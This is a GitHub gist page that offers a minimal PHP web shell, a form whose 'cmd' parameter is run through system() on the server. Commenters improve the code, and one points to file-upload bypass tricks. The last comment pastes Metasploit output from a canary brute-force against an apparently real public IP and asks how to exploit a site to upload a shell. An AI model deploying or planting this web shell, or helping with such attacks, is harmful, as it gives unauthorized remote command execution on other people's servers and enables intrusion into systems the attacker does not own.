Skip to content

Instantly share code, notes, and snippets.

@joswr1ght
Last active January 12, 2025 07:51
Show Gist options
  • Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
@larsonreever
Copy link

However, there are a number of potential entry points, from coding error in the web application to configuration issues in either the web server or PHP, and you need only one single exploitable vulnerability to be successful. once can have a good overview on web shells with examples here https://secure.wphackedhelp.com/blog/web-shell-php-exploit/

@Sh1n0g1
Copy link

Sh1n0g1 commented Jul 15, 2019

It's better to have the isset function before accessing the global variable $_GET['cmd']
like this if(isset($_GET['cmd']))

@joswr1ght
Copy link
Author

It's better to have the isset function before accessing the global variable $_GET['cmd']
like this if(isset($_GET['cmd']))

👍Thanks!

@fractalspace
Copy link

Nice and simple

@sahiljack
Copy link

That's actually helpful. Thanks

@EphDoering
Copy link

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

@joswr1ght
Copy link
Author

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

Updated, thank you!

@rmdhfz
Copy link

rmdhfz commented Sep 6, 2021

Nice.....

@KnightChaser
Copy link

Thank you :) 👍

@achabi-ismail
Copy link

thanks

@unaiiM
Copy link

unaiiM commented Apr 26, 2023

better:

if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2&<1');
}

Adding 2&<1 you can see the error output.

@pdwilso
Copy link

pdwilso commented Jan 7, 2024

better:

if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2&<1');
}

Adding 2&<1 you can see the error output.

TY

@joswr1ght
Copy link
Author

better:

if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2&<1');
}

Adding 2&<1 you can see the error output.

It's 2>&1 to redirect STDERR to STDOUT. Added, thanks!

@ADMIN999975
Copy link

if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2&<1');
}

@blockwizard777
Copy link

Could you please let me know how to upload the webshell file on website?

@joswr1ght
Copy link
Author

Could you please let me know how to upload the webshell file on website?

This is the hard part. You need to identify a vulnerability to exploit first, then when you're successful, you can use a script like this one for remote access. This script is a secondary tool; you need to gain that access first. Good luck!

@codedsprit
Copy link

Could you please let me know how to upload the webshell file on website?

Hey, we need some deep knowledge for what you want to know, I can't write everything here, but Study about file upload vulnerability, tons of resources there. You can check this also ..

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/README.md#upload-tricks

@craccbabyy
Copy link

thank you bro! i was trying www's php webshell and i cant get it to work

@bdelusions
Copy link

metasploit [] Started reverse TCP handler on 10.0.2.15:4444
[
] 81.70.92.51:80 - Searching for stack canary
[] 81.70.92.51:80 - Assuming byte 0 0x00
[
] 81.70.92.51:80 - Brute forcing byte 1
[+] 81.70.92.51:80 - Byte 1 found: 0x07
[] 81.70.92.51:80 - Brute forcing byte 2
[+] 81.70.92.51:80 - Byte 2 found: 0x01
[
] 81.70.92.51:80 - Brute forcing byte 3
[+] 81.70.92.51:80 - Byte 3 found: 0x00
[+] 81.70.92.51:80 - Canary found: 0x00010700

[*] Exploit completed, but no session was created.

Any ideas how i can solve this?

just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project. and i am stuck here.
Pointers would be much appreciated

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment